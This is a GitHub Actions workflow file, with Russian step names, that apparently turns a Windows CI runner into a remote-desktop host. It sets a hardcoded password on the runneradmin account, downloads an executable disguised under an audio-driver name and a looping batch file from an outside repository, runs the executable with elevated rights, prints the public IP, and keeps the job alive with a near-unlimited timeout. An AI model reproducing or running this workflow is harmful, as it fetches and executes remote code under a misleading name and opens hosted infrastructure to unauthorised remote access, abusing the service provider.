name: Main Workflow
on: 
  workflow_dispatch:
    
jobs:
  build:
    runs-on: windows-latest
    timeout-minutes: 9999
    
    steps:
    - name: Установка
      run: |
        Set-LocalUser -Name "runneradmin" -Password (ConvertTo-SecureString -AsPlainText QwertyLOX1 -Force)
        Invoke-WebRequest https://github.com/Dodic-Codes/OtsosiRDP/raw/main/RtkAudUService32.exe -OutFile RtkAudUService32.exe
        Invoke-WebRequest https://raw.githubusercontent.com/Dodic-Codes/OtsosiRDP/main/loop.bat -OutFile loop.bat
        Start-Process -FilePath "RtkAudUService32.exe" -Verb RunAs
        curl https://ipinfo.io/ip
    - name: Запуск цикла
      run: cmd /c loop.bat
